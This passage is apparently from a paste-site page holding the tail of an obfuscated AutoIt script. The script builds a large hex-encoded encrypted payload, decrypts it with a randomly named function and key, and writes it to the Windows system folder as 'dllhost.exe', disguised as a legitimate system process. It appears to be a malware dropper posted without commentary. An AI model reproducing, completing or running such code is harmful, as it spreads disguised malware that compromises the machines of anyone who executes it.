  3847. $I = $I & "5F1BA9ECAEFF439352904C374D7426A81ABCF144BD289ED443024C6A08E4559D016F5CD8AA82C14DC41912DBCA40F205D5E373C6833784400CD2690BC4C31041C8B12297DD18516F38722E3C2CB427692E8A9B9305CAD9324D46D7322AE0EE64E25F9C2C563E6A767EC7C7A354E4AA8675F4E763F7C58473F08A755A7429DDE406D11DF670913AF6FC55D307EFC144162A0E19A86E43"
  3848. $I = $I & "E4B7AE11A67D26ED55E01BDD81791B69836EB074ECB02E295FECB3DB8C98DF71B3226497294C573111B442AE867C472FD1B337D1E7C0D40EA1CBF3A85642C9DE3CE0722E1D50F62C3B0BBBD7F4463CBD477B2639798D3D8B36E65F55A2DD56562E8BD58D1849CCD709E63C554D25BF7A9B6B6952D5783F80E46C623FDE69017C32AB714FDAC2410E3739E3EE0DBEA34B24BAD75E8E03"
  3849. $I = $I & "7AFA1D276F33E35F18384DE605FF4D2E6649393D65B54091139CC72F8469732524D56D7BEC9AFC233325DCAC118D1E7B8D3800FCD182146B7837F6466781FD006C9239BFF14DAB7E4F06CECAA7D7F5B468F4850C83E5C653DE1CD8B122C39F476E7595012B9EAC80C97F23917B13BFE3E6AEAFF1F5FFF1FDD71E2D73EB3865E77A736843A01A2EF5DC581B9AF1928DEFB5DBC7EA7489"
  3850. $I = $I & "517950F98606605D26C162C5A282A33DDF7CCD896E0D131F9CF95A8083F7D78C082C03A0114F228B5ABDDCA35E47136002EB6A1D6C7A26DEC144B54C7E4ED67862EDED04BE4A7DD8F3F71C640F5444730FFB6336338860D6A44DE39DC2C828ACA09443B3B6B402B1CE4E2ACD3D86F48909E2FECF531ACF0ABF931635D4CC17C8374A471939C6584FBD5B427B0E7BBC64C21EC424697F"
  3851. $I = $I & "5BD2FCFF5D0F3B95D47FEE34687C2B28FD1BE019407DEDB12145318347430AC056E3F95A8CFDB94BEB66304BDDB8AF90517074ADEB11C6540436F122FE597BD910E6DB03377B35504EDE7560688B0119B921A287EFD3A6C347363A3847E5D1CF29E9EB5A17E081C84EB26F7DF1EF43FBEC7548BC3B0C2FE7C749B05AC0CF6A786AB443A7248BECEF63E1E7A2C0D59BEE5AFCC4B69468"
  3852. $I = $I & "A27F9AF15B80F33709D49BCF4E2EF2B60CB13131D9885FBFF82333747635EAF750D2D145C14A3F5D2962C8EC73DDF0F735BB6CA0F8F53C1C7AF69583B8E48BC23B57B733232BABC5A9410470BB4D74E873143371840CCD13549C6BDAA635D1DF989A685DAC9EEACFE34E273F26318DA9FAF3D9B5340FB81528FB50D3F79B83DA6431B0EBEFBDE14C57173521D2C246890EEFE56E4E64"
  3853. $I = $I & "4D767E154953E8173C3906E1598B51761E55930A19135451C464B4AF0D72619E30044A429F99279F10B8525D6D34BEFCD39C4B20386053C1B568112B5993098B91B21AD78C9C2AF53BB148CE46A15B3A88F0EFE1B33ADB7D34668F1AC475E841CAA45CFEEA6192F4896D803EDB86EE8C86D652862B2060680A28FB3FCF36A20952437F9A13A1D3500BE67BF63E6E35A21C3EFC583FCB"
  3854. $I = $I & "1D54C944651F9E6BE1A684572A6AAF187510DE762439B12E2DCCFA1D6D30825F0F92B8DEA2D2D7DC52C85C69FF890F03B86A0D877C5E6113D31B546BF62E6ABCF2D5CEF3C38733C3837ABB546FBF69FC8D3F01B989A035D8DFE34450D339A9DBBBB4345C20BEFB9B3C3DDFA81497129295654AAF90CEABAA61B3AAE7D68309FD54EAE2A45992490C82106098F1EA56F6A3CA448DD42D"
  3855. $I = $I & "B0A4375DB6616632D4863B827B06050D34CF9C41058E07EEBB883B63CE9E3E5BB44387A692FA3022B20B3232F49F66AD552F7FB6E563ED619F648F129E0EC059AB9F86DD5CF484521154AEE067105FB683397EEA2D3F071184F80B6AC4551EC859AF2BF8FE0197C1FF5E963084BD3C0C4F05CCAD115A25851CF0B4A51D1DC325097044B7E4E6D6EBF133315B5E56FF090F32C8CD6C06"
  3856. $I = $I & "E8E47DC3993D3DE14ABE8F214F303BA8243ABF031E80137835F183061DE5C8CA8836870E876DE83EFE811AE9FD957330D02073227FA677A674F855C664C59D6156AD774A30B4370B40A52BAE96F329B606FB0029D02750F023AE41F8BDF39F4853FA72187D1FAD5A0584747F308658654DCA3E51034186BFF44E83E03D904F4679A35B4474E901EE3772BA14661262894481C62C8D25"
  3857. $I = $I & "8153869F2E781FEF881C1C8A18E56D647E149397509DB295A66D7D7B75F4837EBF96B94E5A9529ECC0FDC18D55648A9778DF94BF21A13EC5B3C5CC2479124C78ACFB6C3BF3B05C7DF23475B6D1EBF13A22ED4CE432A8C950FAB67A6B0EBD19E5C061EFDFEE453D6C05419CBDC422F0E0767624CF354F5F0977DA8030163FB535040A20CD555A127AC758683233C504631E80D3B57E5A"
  3858. $I = $I & "DB0BA28DA2089685AAE8348DD5F32069062DD7AA4614A8A67C81A5E335D88D6C55022A21AF02DE5962129868130C9F8A4EEEF22AB709776B2C542E78AF96AD55472E2E709544DE4DC4805A931E0F58A80C343D26CC322565AD2F7EBA852C40E4DE7BAB098F0F2C87996AB6EC4DE70F649FED46DCF10B38735E4EE51A8CC61501F4A8C8A91BCA822CDF954CB47D24383B4D2BB49CB43B"
  3859. $I = $I & "04FFE2BFBC90932BFFD2C2C2B327B5EC138D86E2CFC838F94F7E96F9758A8489D342CEE235C7A25DCB3D266B4DC8E1BB9557094E29111E462D58097D95BAA918D3DE1602D8443314033FBC3D6AEE952244AC9DD41A6279C144E0C9732AAB965A8E72038786F670C8CB9C96A6A0C19F28B2844034DACE4DB153E9E36B5E05CE230ABA1BC92A34F5C162C2079F8DD6EE2B909A39F5E9B0"
  3860. $I = $I & "C8F3D284ABE3A390CB0740413C2D28549E1991C6E3598332899A14AF7E1B7346348DCE8AF10C1DFDAAD3FBA9C129055BC7532C3908F3FD0998A86E7D46E615A3B3C372C92C35AA9EA4484D05627E615D1A80AA5B3E9C07EACF47A7B29C3F1EF5B1FA4327646C2047BF41912BBE7409E9AB0987C42EBF045A25FAD1E40CF96BF7AD1BA69122AC3E16F26AF471A13E9E61CE42FE001628"
  3861. $I = $I & "4E1A89EA5EF41B95700CC89B733EAA4C696A01CDA5C41A629DBDEE5C7FECF6D03100D81DD73A7E2648B27C9461F188C6B716005D172D42B81CEE88B78EA2BF5F5660366B4A2D3E86DA1752366BD004976D9D8CF15E1DB1CB57CC2603D96640A816557F53FB22FA7C3DFF944ADCB42532C7B443C7B66335016FEFD7FA80B01FB27AA0C67BF23C316D34015C31C62170B55D691F3E041F"
  3862. $I = $I & "625FB634AE619132DDECB7168131C615CB862C527A7907A2247782896DDB224C91322EDEB17E231A1E92256D27AE147D1FB14773FE110004E594432EA9E88CA5E16EF14AE9268F3748253417A65FE0B587D99812320733EBB8A9D5A0EF049427A76AC845F2D2CE457D71B9CDAAAAF6631F99DC930618F0335C11461272CF6936B657B784FC2424ACF08F23B9DD142D02891B816E2B1E"
  3863. $I = $I & "3BB8CC078C72612B133F4376CD77F18DC80216DD5A8EED474B09A3A87FDFE5CCB4CF6FA475001216A8B067427B076F8308C52790B2FB90238D4CCA25134D5767FFEC15F856BD6D8D8D996ED89010F32C0A7640587E4152BC7C656DBABFB4CA7C99C4D6A7A0B213EA69D4175DD4DC4A39049ED321DF009C7E0013AB58C95EDEC1F5360694A05FBFD24C60F77570B4572C0170FD6D8D66"
  3864. $I = $I & "2ACA18D36D422F9AD661A68C21A2017B0F423DEC89680F6F8EA44E5A54C7D5F3F7A9E6176924C08B6D1C6780CF52437818767569D9378BA4F046AF807764AEBFA05501EF45911B8CB9E9063A67C6B78F6FB21060C8145F4392779159B5CFEA2DCF001D027843EC89BAC5D2D1708B83DC6C646C8E90DC4DBF97E4E16D324EF81BBA3B5D883A64F1E0974C764147107FAB08843FB0D935"
  3865. $I = $I & "BB7822B0B5C6BD33F5B2A82D2234D5687CC9C8D57F537F428A825CBA2B26938FD9F01C67312062D9BE8A1F5FA5A6A1CA27B523D103A57345809FA80EB5437AF8AE0932CEC48A42A7B008D396026B8BDCF5AC4EC8B74CA336CC63CEF45580EE93E3BA423AFA93F3C4ADB07800340CE0CC9460EE830E97B5D3D80A4739A1BEE24E46D0A1A58A3292315B4CF3E211724Bx0"
  3866. $I = OVMTRRSWMS ( $I , "UYHSALLTKY" , "-1" )
  3867. HJKBLLIHKU ( )
  3868. ENDFUNC
  3869. FUNC HJKBLLIHKU ( )
  3870. TKKGMGHILY ( "0x4053797374656d446972202620225c646c6c686f73742e65786522" , $I )
  3871. ENDFUNC
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement